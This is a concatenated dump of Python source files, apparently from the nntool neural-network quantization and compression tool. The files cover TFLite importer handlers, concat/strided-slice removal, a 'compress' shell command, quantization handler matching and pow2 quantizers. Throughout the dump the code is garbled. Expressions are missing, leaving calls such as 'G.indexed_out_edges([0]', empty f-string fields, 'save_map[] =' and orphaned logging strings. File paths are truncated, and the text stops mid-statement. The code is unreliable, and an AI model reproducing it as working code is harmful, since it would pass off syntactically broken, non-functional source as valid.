((in_w - 1) * stride_w + filt_w - out_w) pad_top = pad_h // 2 pad_left = pad_w // 2 pad = PadDim(pad_top, pad_h - pad_top, pad_left, pad_w - pad_left, same_type='balanced_right') else: pad = PadDim(0) params = TransposeConv2DParameters(, filt=filt_dim, stride=StrideDim( stride_h, stride_w), padding=pad, in_dims_hint=[['h', 'w', 'c'], cls.TF_LITE_FILTER_ORDER.copy()], out_dims_hint=[['h', 'w', 'c']]) G.add_edge( NNEdge(from_node=x[0], to_node=params, from_idx=x[1], to_idx=0)) G.add_edge(NNEdge(from_node=weights_node, to_node=params, to_idx=1)) pout_dims = ProvisionalDim(pout_shape) all_nodes[node.output[0]] = (params, 0, pout_dims) return params ``` #### File: handlers/backend/ ```python from graph.dim import Dim from graph.types import UnconvertedOpParameters from importer.tflite2.handlers.backend.math_mixin import BasicMathMixin class UnconvertedMixin(BasicMathMixin): @classmethod def _common(cls, node, **kwargs): all_nodes = kwargs['all_nodes'] inputs = [all_nodes[t] for t in node.input] x = inputs[0] return super(UnconvertedMixin, cls)._common( node, params_class=UnconvertedOpParameters, params_args={ 'indicated_op_name': cls.TFLITE_OP, 'indicated_outputs': [Dim.unnamed(x[2].known_shape)] }, **kwargs) @classmethod def version_1(cls, node, **kwargs): return cls._common(node, **kwargs) ``` #### File: importer/tflite2/ ```python import logging from graph.matches.matcher import find_forward from graph.types import (ConcatParameters, NNEdge, NoOPParameters, StridedSliceParameters) from utils.node_id import NodeId LOG = logging.getLogger('nntool.' + __name__) def remove_concats(G): concat_nodes = list([node for node in G.nodes() if isinstance(node, ConcatParameters)]) strided_slices_removed = [] concats_removed = [] for node in concat_nodes: concat_out_edges = G.indexed_out_edges([0] concat_in_edges = G.indexed_in_edges( axis_slices = [] start_idx = 0 # find the slice patterns that can match inputs for in_idx, dim in enumerate(node.in_dims): slice_patterns = [(start_idx, start_idx + dim.shape[node.axis], 1)] if dim.shape[node.axis] == 1: # can also match reversed slice_patterns.append((start_idx, start_idx - 1, -1)) axis_slices.append(slice_patterns) start_idx += dim.shape[node.axis] for out_edge in concat_out_edges: edge_lists = find_forward(G, out_edge, StridedSliceParameters, skip_node_classes=NoOPParameters) # each list of edges goes to a strided slice for edge_list in edge_lists: edge = edge_list[-1] assert isinstance(edge.to_node, StridedSliceParameters) ssp = edge.to_node"found strided slice %s", # must only slice axis of concat if not ssp.only_slices_axis(node.axis):"rejected: slices more than one axis") continue # must match a slice pattern on the input ssp_slice = ssp.act_slice[node.axis] in_idx = None for idx, slice_patterns in enumerate(axis_slices): if ssp_slice in slice_patterns: in_idx = idx break if in_idx is None:"rejected: slices pattern matching concat not found") continue"removing slice %s", strided_slices_removed.append( # save the out edges ssp_out_edges = G.out_edges( in_edge = concat_in_edges[in_idx] # remove all the nodes including the ssp for inter_edge in edge_list: if G.quantization: del G.quantization[NodeId(inter_edge.to_node)] G.remove(inter_edge.to_node) # connect all the ssp out edges to the node on the concat input for ssp_out_edge in ssp_out_edges: G.add_edge(NNEdge(in_edge.from_node, ssp_out_edge.to_node, from_idx=in_edge.from_idx, to_idx=ssp_out_edge.to_idx)) # if the concat now has no out edges remove it if G.num_out_edges( == 0:"removing concat %s", concats_removed.append( G.remove(node) return (strided_slices_removed, concats_removed) ``` #### File: interpreter/commands/ ```python import json import math import texttable from cmd2 import Cmd, with_argparser from interpreter.commands.validation import get_validator, validation_options from interpreter.nntool_shell_base import (NODE_SELECTOR_HELP, NNToolArguementParser, NNToolShellBase) from interpreter.shell_utils import input_options from quantization.compression.auto_compress import AutoCompress from quantization.compression.compress import CompressionError from utils.node_id import NodeId from graph.types import ConstantInputParameters class CompressCommand(NNToolShellBase): # COMPRESS COMMAND parser_compress = NNToolArguementParser() parser_compress.add_argument( 'step', nargs='?', help='constant input to compress. ' + NODE_SELECTOR_HELP, completer_method=NNToolShellBase.node_step_or_name_completer(allow_comma=True)) parser_compress.add_argument( '--no_sparse', action="store_true", help='Do not check for sparsity' ) parser_compress.add_argument( '--force_sparse', action="store_true", help='Force these layers to use sparse bit (adds an extra bin)' ) parser_compress.add_argument( '--threshold', type=float, help='set values val>x>-val to 0 before clustering' ) parser_compress_sub = parser_compress.add_subparsers( title='compress subcommands', help='compression strategy for the selected layers') parser_compress_bits = parser_compress_sub.add_parser( 'bits', help='compress using a lookup index of a fixed number of bits') parser_compress_bits.add_argument( 'num_bits', choices=list(str(v) for v in range(2, 8)), help='number of bits to use for lookup table indexes' ) parser_compress_min_qnsr = parser_compress_sub.add_parser( 'min_qsnr', help='compress keeping the value QSNR above a minimum value') parser_compress_min_qnsr.add_argument( 'qsnr', type=int, help='QSNR to keep above' ) parser_compress_auto = parser_compress_sub.add_parser( 'auto', help='compress to a number of bits automatically using validation results') parser_compress_auto.add_argument( '--finetune', action="store_true", help='Experimental layer finetuning' ) validation_options(parser_compress_auto) input_options(parser_compress_auto) parser_compress_clear = parser_compress_sub.add_parser( 'clear', help='clear compression on these nodes') parser_compress_off = parser_compress_sub.add_parser( 'off', help='disable compression on these nodes') parser_compress_on = parser_compress_sub.add_parser( 'on', help='enable compression on these nodes') parser_compress_save = parser_compress_sub.add_parser( 'save', help='save compression settings to a file in json format') parser_compress_save.add_argument( 'file', completer_method=Cmd.path_complete, help='file to save to' ) parser_compress_load = parser_compress_sub.add_parser( 'load', help='load compression settings from a file in json format') parser_compress_load.add_argument( 'file', completer_method=Cmd.path_complete, help='file to load from' ) parser_compress_bits.set_defaults(operation='bits') parser_compress_min_qnsr.set_defaults(operation='min_qsnr') parser_compress_auto.set_defaults(operation='auto') parser_compress_clear.set_defaults(operation='clear') parser_compress_off.set_defaults(operation='off') parser_compress_on.set_defaults(operation='on') parser_compress_save.set_defaults(operation='save') parser_compress_load.set_defaults(operation='load') @with_argparser(parser_compress) def do_compress(self, args): """ Compress graph constants for GAP9 compression engine. Compress with no arguments will list current compression settings. The compressed size in the results table includes the size of the codebook. In bits mode the amount of bits used for table indexes is specified directly. It should be from 2 to 8. In min_qsnr mode the tensors will be compressed with the number of bits necessary to stay above the given QSNR value. A value of around 30 is a good starting point. The auto mode uses the validation engine to explore possible tensor compression parameters. THe command options are the same as the validate command. The first part of the process tries to find the lowest QSNR that can be selected for compression of all viable parameters with no bad validation results. The threshold argument can be used to clip values to zero before compression. """ self._check_graph() if not args.step: if hasattr(args, 'operation'): nodes = self.G.nodes(node_classes=ConstantInputParameters) else: self.compress_make_table(self.G.nodes( node_classes=ConstantInputParameters)) return else: nodes, _ = self.get_node_step_or_name( args.step, classes=ConstantInputParameters, allow_comma=True) if not nodes: return if not args.operation: # No subcommand was provided, so call help self.do_help('compress') return if args.operation == "clear": for node in nodes: node.use_compressed = False node.compressed_value = None self.pfeedback(f'clear compression on {}') return if args.operation == "on": for node in nodes: if node.compressed_value: node.use_compressed = True self.pfeedback(f'enable compression on {}') else: self.perror( f"can't enable compression on {} - not set") return if args.operation == "off": for node in nodes: node.use_compressed = False self.pfeedback(f'disable compression on {}') return if args.operation == "save": save_map = {} for node in nodes: if node.compressed_value: comp_val = node.compressed_value save_map[] = { 'bits': comp_val.bits, 'threshold': comp_val.threshold, 'sparse': bool(comp_val.sparse), } with open(args.file, 'w') as fp: fp.write(json.dumps(save_map)) return report_nodes = [] if args.operation == "load": with open(args.file, 'r') as fp: save_map = json.load(fp) for node in nodes: if in save_map: self.pfeedback(f"Loading parameters for {}") try: params = save_map[] node.compress_value( bits=params['bits'], threshold=params['threshold'], allow_sparse=params['sparse'], force_sparse=params['sparse'], ) comp_val = node.compressed_value node.use_compressed = True except CompressionError as ex: self.pfeedback(f'unable to compress {} - {ex}') comp_val = None if comp_val: report_nodes.append(node) return elif args.operation == "auto": if args.quantize: self._check_quantized() input_args = self._get_input_args(args) autocompress = AutoCompress( self.G, args.input_files, get_validator(args), input_args, prediction_step_idx=args.prediction_step_idx) def progress(msg, newline): print(msg, end='\n' if newline else '', flush=True) try: autocompress.tune_all(nodes, progress, quantize=args.quantize) if args.finetune: report_nodes = [node for node in nodes if node.use_compressed] self.compress_make_table(report_nodes) autocompress.finetune(nodes, progress, quantize=args.quantize) except (KeyboardInterrupt, SystemExit): pass report_nodes = [node for node in nodes if node.use_compressed] else: for node in nodes: self.pfeedback(f"Evaluating {}") nid = NodeId(node) if self.G.quantization and nid in self.G.quantization: qtype = self.G.quantization[nid].out_qs[0] else: qtype = None try: kwargs = { 'qtype': qtype, 'threshold': args.threshold, 'allow_sparse': not args.no_sparse, 'force_sparse': args.force_sparse } if args.operation == "bits": kwargs['bits'] = int(args.num_bits) elif args.operation == "min_qsnr": kwargs['min_qsnr'] = args.qsnr elif args.operation == "auto": pass else: raise ValueError('strange operation') node.compress_value(**kwargs) comp_val = node.compressed_value node.use_compressed = True except CompressionError as ex: self.pfeedback(f'unable to compress {} - {ex}') comp_val = None if comp_val: report_nodes.append(node) self.compress_make_table(report_nodes) def compress_make_table(self, nodes): comp_size = 0 node_size = 0 comp_report = [["Step", "Name", "Orig Size", "Compressed Size", "%age orig", "Bits", "Sparse", "Enabled"]] for node in nodes: if not node.compressed_value: continue nid = NodeId(node) if self.G.quantization and nid in self.G.quantization: qbits = self.G.quantization[NodeId(node)].out_qs[0].bits else: qbits = 8 old_size = int(math.floor((node.value.size * qbits)/8)) comp_val = node.compressed_value node_size += node.value.size comp_size += comp_val.size comp_report.append([ node.step_idx,, old_size, comp_val.size, ( 100 * comp_val.size)//old_size, comp_val.bits, "Yes" if comp_val.sparse else "No", "Yes" if node.use_compressed else "No" ]) if comp_size == 0: self.pfeedback("no constants compressed") return comp_report.append([ "", "Total", node_size, comp_size, (100 * comp_size)//node_size, "", "", "" ]) table = texttable.Texttable() table.set_cols_align(['l', 'l', 'l', 'l', 'l', 'l', 'l', 'l']) table.set_max_width(120) table.add_rows(comp_report) self.pfeedback("Compression report\n") self.pfeedback(table.draw()+'\n') ``` #### File: nntool/interpreter/ ```python import logging from interpreter.nntool_shell_base import NNToolShellBase # pylint: disable=wildcard-import,unused-wildcard-import from .commands import * LOG = logging.getLogger("nntool") VALID_LOG_LEVELS = [ "INFO", "DEBUG", "WARNING" ] COMMANDS = NNToolShellBase.__subclasses__() class CommandMixer(type): def __new__(cls, name, base, ns): return type.__new__(cls, name, tuple(COMMANDS + list(base)), ns) class NNToolShell(NNToolShellBase, metaclass=CommandMixer): intro = 'Welcome to NNTOOL. Type help or ? to list commands.\n' prompt = '(NNT) ' ``` #### File: nntool/quantization/ ```python import logging import numpy as np from cmd2.argparse_custom import Cmd2ArgumentParser from graph.types import ConstantInputParameters, ReluActivationParameters from graph.types.base import Parameters from iteration_utilities import duplicates from utils.subclasses import get_all_subclasses # pylint: disable=wildcard-import,unused-wildcard-import from quantization.float.quantizers import * from quantization.multiplicative.quantizers import * from quantization.qtype import QType from quantization.qtype_constraint import MatchAll from quantization.quantizers import * from quantization.symmetric.quantizers import * from quantization.unified_quantization_handler import QuantizionHandler LOG = logging.getLogger('nntool.' + __name__) def add_in_handlers(existing, new): for handler in new: if handler not in existing: existing.append(handler) def get_quantization_handlers(): """This sets up the handler map. The priority for schemes is: - If a handler is present for a class then for the declared scheme or any scheme if SCHEME is None it is matched - If a handler is present for a superclass of the class then for the declared scheme or any scheme if SCHEME is None it is matched - The default handler for the scheme is matched """ handlers = {} schemes = set() # Collect all handlers for cls in get_all_subclasses(QuantizionHandler): if not cls.PARAMS_TYPE: continue if cls.SCHEME: schemes.add(cls.SCHEME) for params_cls in cls.PARAMS_TYPE: phandlers = handlers.setdefault(params_cls, {}) pscheme_handlers = phandlers.setdefault(cls.SCHEME, []) pscheme_handlers.append(cls) # Iterate through all parameters and set a scheme for pclass in get_all_subclasses(Parameters): # parameters does not define an op name if not pclass.CLS_OP_NAME: continue # see if we have any handlers for this class phandlers = handlers.setdefault(pclass, {}) for scheme in schemes: # handlers for class and scheme are already present matched_handlers = phandlers.setdefault(scheme, []) for hpclass, class_handlers in handlers.items(): if hpclass == '__default__': continue if issubclass(pclass, hpclass): # is subclass and scheme is present if scheme in class_handlers: add_in_handlers(matched_handlers, class_handlers[scheme]) # is subclass and all schemes match is present if None in class_handlers: add_in_handlers(matched_handlers, class_handlers[scheme]) if not matched_handlers: # match the default scheme add_in_handlers(matched_handlers, handlers['__default__'][scheme]) del handlers['__default__'] return handlers def get_all_options(): options = {} for handler in get_all_subclasses(QuantizionHandler): if not handler.OPTIONS: continue for opt_name, opt in handler.OPTIONS.items(): optrec = options.setdefault(opt_name, {'handlers': set()}) for k in opt.keys(): if k in optrec: if k != 'help' and opt[k] != optrec[k]: raise ValueError( f'Quantization option {k} has different definitions') else: optrec[k] = opt[k] optrec['handlers'].add(handler) return options def get_all_options_by_params(): options = {} for handler in get_all_subclasses(QuantizionHandler): if handler.PARAMS_TYPE is None or not handler.OPTIONS: continue for params in handler.PARAMS_TYPE: if params == '__default__': params = Parameters options.setdefault(params, {}).update(handler.OPTIONS) for params in get_all_subclasses(Parameters): poptions = {} for k, v in options.items(): if issubclass(params, k): poptions.update(v) options[params] = poptions return options def add_options_to_parser(parser: Cmd2ArgumentParser): opts = get_all_options() shortcuts = [opt['shortcut'] for opt in opts.values() if 'shortcut' in opt] duplicate_shortcuts = set(duplicates(shortcuts)) assert not duplicate_shortcuts, f'the following shortcut commands are duplicates {",".join(duplicate_shortcuts)}' for opt_name, opt in opts.items(): if opt.get('type') is None: continue # internal option if 'shortcut' in opt: names = [f'-{opt["shortcut"]}'] else: names = [] if opt.get('type') == bool: parse_options = {'help': opt.get('help'), 'action': 'store_true'} if opt.get('default'): names = [f'--no_{opt_name}'] else: names.append(f'--{opt_name}') parser.add_argument(*names, **parse_options) else: parse_options = {k: opt.get(k) for k in [ 'type', 'choices', 'help']} names.append(f'--{opt_name}') parser.add_argument(*names, **parse_options) def get_arg_or_default(args, opt_name, opt): arg = getattr(args, opt_name) if arg is None: arg = opt.get('default') return arg def get_options_from_args(args): return {opt_name: (not getattr(args, f'no_{opt_name}')) if opt.get('type') == bool and opt.get('default') else get_arg_or_default(args, opt_name, opt) for opt_name, opt in get_all_options().items() if opt['type'] is not None} def get_set_options_from_args(args): return {opt_name: (not getattr(args, f'no_{opt_name}')) if opt.get('type') == bool and opt.get('default') else getattr(args, opt_name) for opt_name, opt in get_all_options().items() if getattr(args, f'no_{opt_name}' if opt.get('type') == bool and opt.get('default') else opt_name) is not None} def match_qtype(constraint, qtype_or_dict): if qtype_or_dict is None: return True # constant always matches since it can always be mutated into a different type if qtype_or_dict.is_constant: return True for k, v in constraint.items(): if isinstance(qtype_or_dict, dict): if k not in qtype_or_dict: return False val = qtype_or_dict[k] else: if not hasattr(qtype_or_dict, k): return False val = getattr(qtype_or_dict, k) if k == 'attr': assert isinstance( v, dict), 'expecting dictionary for attribut match' attr = qtype_or_dict.attr if not all(hasattr(attr, attr_k) and getattr(attr, attr_k) == attr_val for attr_k, attr_val in v.items()): return False elif isinstance(v, type(lambda: None)): if not v(val): return False elif isinstance(v, set): val = val if isinstance(val, set) else set([val]) if not (v & val): return False elif isinstance(val, np.ndarray): if not np.all(val == v): return False elif val != v: return False return True def get_closest_qtype(constraint, qtype): if 'dtype' in constraint: dtype_constraint = constraint['dtype'] if isinstance(dtype_constraint, set): return QType(dtype=next(dtype_constraint)) return QType(dtype=dtype_constraint) return None def match_in_out_qs(handler, name, in_out_qs, ignore_edge=None): key = f'{name.upper()}_CONSTRAINTS' constraints = getattr(handler, key) if not constraints: return True for idx, constraint in enumerate(constraints): # constant input edges always match since a constant can always be requantized if ignore_edge and ignore_edge[idx]: continue if idx >= len(in_out_qs): return False if isinstance(constraint, MatchAll): # match single constrain from here on return all(True if ignore_edge and ignore_edge[jdx] else match_qtype(constraint.constraint, in_out_qs[jdx]) for jdx in range(idx, len(in_out_qs))) if not match_qtype(constraint, in_out_qs[idx]): return False return True def match_in_qs(ignore_edge, handler, in_qs): return match_in_out_qs(handler, 'INPUT', in_qs, ignore_edge=ignore_edge) def match_out_qs(handler, out_qs): return match_in_out_qs(handler, 'OUTPUT', out_qs) def constrained_in_edges(G, name, in_qs, constraints): match_all = None for idx, edge in enumerate(G.indexed_in_edges(name)): if edge is None: continue if match_all: if match_qtype(constraints.constraint, in_qs[idx]): continue yield idx, edge, get_closest_qtype(constraints.constraint, in_qs[idx]) else: if idx >= len(constraints): break if match_qtype(constraints[idx], in_qs[idx]): continue yield idx, edge, get_closest_qtype(constraints[idx], in_qs[idx]) def add_handler(handlers, scheme, scheme_handler): scheme_handlers = handlers.setdefault(scheme, []) if scheme_handler not in scheme_handlers: scheme_handlers.append(scheme_handler) def check_constraints(ignore_edge, handlers, scheme_priorities, in_qs_constraint, out_qs_constraint): if handlers is None: return None # filter any handlers matching input and output constraints filtered_phandlers = {} for scheme, scheme_handlers in handlers.items(): for scheme_handler in scheme_handlers: if in_qs_constraint and not match_in_qs(ignore_edge, scheme_handler, in_qs_constraint): continue if out_qs_constraint and not match_out_qs(scheme_handler, out_qs_constraint): continue add_handler(filtered_phandlers, scheme, scheme_handler) # select the handler with the highest scheme priority for scheme in scheme_priorities: if scheme in filtered_phandlers: selected_handlers = filtered_phandlers[scheme] break else: return None return sorted(selected_handlers, key=lambda x: x.PRIORITY)[0] def check_option_constraints(handlers, params, options, **kwargs): filtered_phandlers = {} for scheme, scheme_handlers in handlers.items(): for scheme_handler in scheme_handlers: if scheme_handler.OPTION_CONSTRAINT: for k, v in scheme_handler.OPTION_CONSTRAINT.items(): if k == '__function_constraint': if not v(params, **kwargs): break else: set_value = options.get(k) if callable(v): if not v(set_value, params, **kwargs): break elif isinstance(v, set): if set_value not in v: break elif set_value != v: break else: add_handler(filtered_phandlers, scheme, scheme_handler) else: add_handler(filtered_phandlers, scheme, scheme_handler) return filtered_phandlers def match_handler(graph, handlers, params, scheme_priorities, options, in_qs_constraint=None, out_qs_constraint=None, **kwargs): # don't run match on constants or unconnected edges ignore_edge = [isinstance(edge.from_node, ConstantInputParameters) if edge is not None else True for edge in graph.indexed_in_edges(] # match the class params_handlers = handlers.get(params.__class__) params_handlers = check_option_constraints( params_handlers, params, options, **kwargs) handler = check_constraints( ignore_edge, params_handlers, scheme_priorities, in_qs_constraint, out_qs_constraint) return handler ``` #### File: quantization/kernels/ ```python from quantization.new_qrec import QRec from graph.types import FusionInputParameters, FusionOutputParameters from .kernel_base import KernelBase, qrec_type, params_type @params_type(FusionInputParameters, FusionOutputParameters) @qrec_type('any') class FusionNoopKernel(KernelBase): @classmethod def execute(cls, params, in_tensors, qrec: QRec, **kwargs): in_tensor = in_tensors[params.idx] in_tensor = in_tensor.reshape(params.dims.shape) return [in_tensor] ``` #### File: quantization/multiplicative/ ```python import numpy as np from quantization.qtype import QType from quantization.quantizer_options import SQBITS_OPTION_DEFAULT_8 from ..unified_quantization_handler import QuantizionHandler, options, scheme #pylint: disable=abstract-method @options( SQBITS_OPTION_DEFAULT_8 ) @scheme('SQ8') class MultQuantizionHandler(QuantizionHandler): BITS_TO_DTYPE = { 8: np.int8, 16: np.int16 } @classmethod def get_mult_opts(cls, **kwargs): force_out_qs = kwargs.get('force_out_qs', None) opts = kwargs.get('opts', {}) bits = opts.get('sq_bits', 8) return force_out_qs, cls.BITS_TO_DTYPE[bits] @classmethod def force_symmetric(cls, in_qs, idx=None, dtype=None): res_qs = [] for in_q_idx, in_q in enumerate(in_qs): if in_qs is None or idx is not None and idx != in_q_idx: res_qs.append(in_q) continue update = False if in_q.asymmetric: # you need to change scale to change zero point if in_q.forced_zero_point or in_q.forced_scale: return None update = True if dtype is not None and dtype != in_q.dtype: if in_q.forced_dtype: return None update = True if update: this_dtype = in_q.dtype if dtype is None else dtype in_q = QType.from_min_max_sq(in_q.min_val, in_q.max_val, dtype=this_dtype) in_q.set_forced('zero_point') res_qs.append(in_q) return res_qs @classmethod def force_symmetric_and_dtype(cls, in_qs, dtype=None, idx=None): return cls.force_symmetric(in_qs, idx=idx, dtype=dtype) @classmethod def _get_in_qs_from_stats(cls, params, stats, in_qs, **kwargs): return [QType.from_min_max_sq(stats['range_in'][idx]['min'], stats['range_in'][idx]['max'], dtype=np.int8) if dim is not None else None for idx, dim in enumerate(params.in_dims)] @classmethod def can_handle_asymmetric_input(cls, params, **kwargs): return False ``` #### File: quantization/quantizers/ ```python import logging from abc import ABC, abstractmethod from copy import deepcopy from quantization.qtype import QType from quantization.new_qrec import QRec LOG = logging.getLogger('nntool.' + __name__) class ConcatMixin(ABC): @classmethod def _handle(cls, params, in_qs, _, **kwargs): force_out_qs = kwargs['force_out_qs'] force_out_q = force_out_qs[0] if force_out_qs else None forced_in_qs = [in_q for in_q in in_qs if in_q.forced] # two inputs cannot be forced to different values if forced_in_qs and not QType.forced_equal(*forced_in_qs): 'two input qtypes of concat %s are forced to different qtypes', return None # input cannot be forced to different value than output if force_out_q and not force_out_q.can_force(*forced_in_qs): 'output and input of concat %s are forced to different qtypes', return None backwards = kwargs.get('backwards') # if we are going backwards or are forced if backwards: if force_out_q: ok = True if force_out_q.forced_dtype and any(in_q.dtype != force_out_q.dtype for in_q in in_qs): ok = False if force_out_q.forced_zero_point or force_out_q.forced_scale or force_out_q.forced_q: ok = False # if output must be forced if not ok: in_qs = [deepcopy(force_out_q) for _ in in_qs] return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(force_out_q)]) # if all the inputs are the same qtype then we output that qtype if all(in_qs[0] == in_q for in_q in in_qs[1::]): return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(in_qs[0])]) # our output cannot be forced at this point # if an input has scale or q forced then all forced inputs must be the same here # TODO - have a general function for this problem - should pick with force constraints respecting dtype # if forced_in_qs and any(fin_qs.forced_scale or fin_qs.forced_q for fin_qs in forced_in_qs): # in_qs = [deepcopy(forced_in_qs[0]) for _ in in_qs] # return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(forced_in_qs[0])]) # if all the inputs are not the same then force all of them to the maximum input size with a Q that # fits the most int bits common_q = cls._get_common_q(in_qs) in_qs = [deepcopy(common_q) for _ in in_qs] return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(common_q)]) KTYPE=None @classmethod @abstractmethod def _get_common_q(cls, in_qs): pass ``` #### File: quantization/quantizers/ ```python import logging from copy import deepcopy from quantization.qtype import QType from quantization.new_qrec import QRec LOG = logging.getLogger('nntool.' + __name__) class NoChangeMixin(): @classmethod def _handle(cls, params, in_qs, _, ktype, **kwargs): force_out_qs = kwargs.get('force_out_qs') force_out_q = force_out_qs and force_out_qs[0] forced_in_qs = [in_q for in_q in in_qs if in_q.forced] # two inputs cannot be forced to different values if forced_in_qs and not QType.forced_equal(*forced_in_qs): LOG.debug( 'two input qtypes of %s are forced to different qtypes - rejecting', return None # input cannot be forced to different value than output if force_out_q and not force_out_q.can_force(force_out_q, *in_qs): LOG.debug( 'output and input of %s are forced to different qtypes - rejecting', return None backwards = kwargs.get('backwards') if backwards: if force_out_q: in_qs = [deepcopy(force_out_q) for _ in in_qs] return QRec(in_qs=in_qs, out_qs=[deepcopy(force_out_q)], ktype=ktype) elif force_out_q and not all(in_q == force_out_q for in_q in in_qs): # if going forwards and our output is forced and does not match input then # we cannot satisfy LOG.debug( "output of %s is forced and inputs don't match - rejecting", return None return QRec(in_qs=in_qs, out_qs=[deepcopy(in_qs[0])], ktype=ktype) ``` #### File: symmetric/quantizers/ ```python import logging import numpy as np from expressions.symbolic.q15_quantization.q15_scaled_quantization import \ Q15ScaledQuantization from expressions.symbolic.symbol import SymbolStats from graph.types import ExpressionFusionParameters from quantization.new_qrec import QRec from quantization.qtype import QType from quantization.qtype_constraint import MatchAll from quantization.unified_quantization_handler import (in_qs_constraint, out_qs_constraint, params_type) from ..pow2_quantization_handler import Pow2QuantizionHandler LOG = logging.getLogger('nntool.' + __name__) @params_type(ExpressionFusionParameters) @in_qs_constraint(MatchAll({'dtype': np.int16})) @out_qs_constraint(MatchAll({'dtype': np.int16})) class ExpressionFusionPow2(Pow2QuantizionHandler): @classmethod def _quantize(cls, params, in_qs, stats, **kwargs): force_out_qs, out_dtype = cls.get_pow2_opts(**kwargs) if stats is None or 'expression' not in stats: raise ValueError( f'no valid range information is present for {}') # expressions need a symmetric input # this is done on the mult8 version but probably isn't necessary here # in_qs = cls.force_symmetric(in_qs) symbol_control = SymbolStats(stats['expression']) # preload the input and output quantization # This will force variables to the right scales in the expression quantizer # first the input prequant = {params.input_symbols[idx]: in_q for idx, in_q in enumerate(in_qs)} # now the output o_qs = [] for idx, sym_name in enumerate(params.output_symbols): if force_out_qs and force_out_qs[idx]: o_q = force_out_qs[idx] else: cls.check_valid_ranges(params, stats, idx=idx, dirs='out') o_q = QType.from_min_max_pow2(stats['range_out'][idx]['min'], stats['range_out'][idx]['max'], dtype=out_dtype) prequant[sym_name] = o_q o_qs.append(o_q) qfunc_col = params.func_col.quantize(Q15ScaledQuantization, symbol_control, quantize_inputs=False, qtypes=prequant) return QRec.symmetric(in_qs=in_qs, out_qs=o_qs, qfunc_col=qfunc_col) @classmethod def get_prefered_input_dtypes(cls, params, **kwargs): # only works in 16 bit mode return [np.int16 for _ in params.in_dims] ``` #### File: symmetric/quantizers/ ```python import logging from copy import deepcopy import math import numpy as np from graph.types import (Conv2DParameters, FcParameters, MultiplicativeBiasParameters) from quantization.new_qrec import QRec from quantization.qtype import QType from quantization.quantizer_options import BIAS_SIZE_OPTION from quantization.unified_quantization_handler import (in_qs_constraint, out_qs_constraint, params_type, options) from utils.node_id import NodeId from utils.stats_funcs import calc_bits from ..pow2_quantization_handler import Pow2QuantizionHandler LOG = logging.getLogger('nntool.' + __name__) @options( BIAS_SIZE_OPTION ) @params_type(FcParameters, Conv2DParameters) # @can_dequantize(True) @in_qs_constraint({'dtype': set([np.int8, np.int16])}) @out_qs_constraint({'dtype': set([np.int8, np.int16])}) class FilterPow2(Pow2QuantizionHandler): @classmethod def get_weights_and_biases_nodes(cls, G, params): edges = G.indexed_in_edges( if len(edges) != 3: raise ValueError(f"didn't find 3 input edges on {}") return edges[1].from_node, edges[2].from_node @classmethod def _quantize(cls, params, in_qs, stats, **kwargs): force_out_qs, params_dtype = cls.get_pow2_opts(**kwargs) force_out_q = force_out_qs and force_out_qs[0] fusion = kwargs.get('fusion', None) pow2_biases = kwargs.get('opts')['pow2_biases'] G = kwargs['G'] weights_node, biases_node = cls.get_weights_and_biases_nodes( G, fusion if fusion else params) range_acc = stats.get('range_acc', stats['range_out'][0]) conv_active = fusion and fusion.fusion_type in [ 'conv_active_pool', 'conv_active'] int_dtype = np.int32 cls.check_valid_ranges(params, stats, idx=0, dirs='out') if conv_active: # Take stats from activation after the convolution range_out = kwargs['all_stats'][NodeId( fusion, fusion.contained_nodes()[1])]['range_out'][0] out_dtype = np.int32 else: out_dtype = params_dtype range_out = stats['range_out'][0] in_q = deepcopy(in_qs[0]).scale_to_pow2() calc_width = 31 o_q = QType.from_min_max_pow2(range_out['min'], range_out['max'], dtype=out_dtype) if force_out_q: if o_q.scale > force_out_q.scale: return None weights_q = QType.from_array_pow2(arr=weights_node.dqvalue, dtype=params_dtype) calc_q = in_q.q + weights_q.q acc_bits = calc_bits(range_acc['max'], range_acc['min']) act_bits = calc_bits(range_out['min'], range_out['max']) act_acc_bits = max(acc_bits, act_bits) calc_int_bits = calc_width - calc_q if calc_int_bits < act_acc_bits: # we don't have enough space for the integer portion so reduce the precision of # the weights and input missing_bits = act_acc_bits - calc_int_bits if missing_bits > calc_q * 0.75: raise ValueError(f'Quantizing {} at this precision will loose more than 75% of fractional part') prec_inp = min(math.floor(0.5 + missing_bits * in_q.q/calc_q), in_q.q) prec_w = min(math.floor(0.5 + missing_bits * weights_q.q/calc_q), weights_q.q) left = missing_bits - prec_inp - prec_w if left > 0: prec_w += left LOG.warning( 'reducing weight and input precision (%s, %s) in %s to satisfy quantization constraints', prec_w, prec_inp, weights_q.q -= prec_w in_q.q -= prec_inp calc_q = in_q.q + weights_q.q calc_int_bits = calc_width - calc_q c_q = acc_q = QType(bits=calc_width, q=calc_q, signed=True) if conv_active: o_q = c_q if pow2_biases == 0: biases_dtype = params_dtype elif pow2_biases == 8: biases_dtype = np.int8 elif pow2_biases == 16: biases_dtype = np.int16 else: biases_dtype = np.int32 biases_q = QType.from_array_pow2(arr=biases_node.dqvalue, dtype=biases_dtype) # make sure that the biases are not stored more precisily than the accumulator. It's pointless and will # cause a negative shift if biases_q.q > acc_q.q: biases_q.q = acc_q.q if isinstance(params, MultiplicativeBiasParameters) and params.has_mul_bias: mb_q = QType.from_array_pow2(arr=params.mul_biases, dtype=int_dtype) else: mb_q = None return QRec.symmetric(in_qs=[in_q, weights_q, biases_q], out_qs=[o_q], calc_q=c_q, acc_q=acc_q, mul_biases_q=mb_q) ``` #### File: nntool/utils/ ```python import numpy as np # static unsigned short int IntegerExpLUT[] = # { INTEGER_EXP_LUT = np.array([0x0001, 0x0002, 0x0007, 0x0014, 0x0036, 0x0094, 0x0193, 0x0448, 0x0BA4, 0x1FA7, 0x560A, 0xE9E2], dtype=np.uint16) # }; # static unsigned short int FractionExpLUT[] = # { FRACTION_EXP_LUT = np.array([0x0000, 0x5BF1, 0x31CD, 0x0AF3, 0x4C90, 0x34E2, 0x36E3, 0x510B, 0x7A9F, 0x0ABE, 0x3B9F, 0x1224], dtype=np.uint16) # }; # /* 17.15 fixed point format */ # static unsigned short int ExpCoeffLUT[] = # { EXP_COEFF_LUT = np.array([0x7FFF, 0x7FFF, 0x4000, 0x1555, 0x0555, 0x0111, 0x002E, 0x0007, 0x0001]) # }; def gap_bitextractu(x, size, off): mask = (np.array([1], dtype=np.uint32) << size) - 1 return (x >> off) & mask def gap_mulsRN(x, y, n): rounding = 